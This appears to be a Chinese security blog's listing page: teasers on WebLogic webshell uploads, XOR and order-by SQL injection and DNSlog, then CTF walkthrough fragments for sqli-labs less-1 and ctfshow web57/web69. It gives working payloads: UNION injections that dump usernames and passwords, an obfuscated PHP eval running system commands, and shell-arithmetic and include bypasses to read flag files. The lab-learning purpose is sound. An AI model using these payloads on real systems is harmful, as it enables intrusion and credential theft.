weblogic上传木马路径选择对于反序列化漏洞，如果获得的是系统权限或者root权限，那就没必要上传木马，但如果只是web安装应用的权限，就上传获取更大权限。 上传需要找到几个点，获取物理路径，如下面三种： 方法1：把shell写...

JDBCJDBC是什么Java DataBase Connectivity（Java语言连接数据库） 接口或类 作用 DriverManager类 1)管理和注册数据库驱动2)得到数据库连接对象 Connection接...

什么是NoSQLNoSQL，指的是非关系型的数据库。NoSQL 有时也称作 Not Only SQL 的缩写，是对不同于传统的关系型数据库的数据库管理系统的统称。NoSQL 用于超大规模数据的存储。（例如谷歌或 Facebook 每天...

sql异或注入当waf过滤了很多东西，但是没有过滤异或(^)符的时候使用。 什么是异或注入异步注入说简单一点就是在构造where后面的判断条件时使用^（异或符号）来达到sql注入攻击的目的 1^1=0 1^0=1 异或注入就是利用sq...

昨天我发现了一个问题 1234<?php$a='693741';$a=base_convert($a,10,36);$a(system("dir")); $a是36进制的eval转换成的...

order by比较大小盲注 这是表里的所有东西 如果我们执行select * from flag where id='' or 1 union select 1,1 order by 2;会出现 不能用and否则就...

什么是DNSlogDNS（Domain Name System）域名服务系统，简单的说就是域名与IP转换服务，比如用户输入a.com,DNS就会将a.com解析找到它真实的ip，以便于访问服务器上的相关服务，DNSlog就是存储在DN...

less-1
看报错可知，这是闭合单引号。
1
2
3
4
?id=1'order by 3 -- - #确定那个字段有回显
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- - #查询表名
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- - #查询列名
?id=-1'union select 1,2,group_concat(username,'~',password) from users -- - #查询当前数据库user表里面的username和password。

web69和web68一样。
payload:
1
c=include("/flag.txt");

web57
题目显示flag在36.php中，而且给出cat和php了，只要想办法构造出36就可以了。
$(())是做运算，$((${_}))=0,所以只要拼接除-36之后取反就行
payload:
1
?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))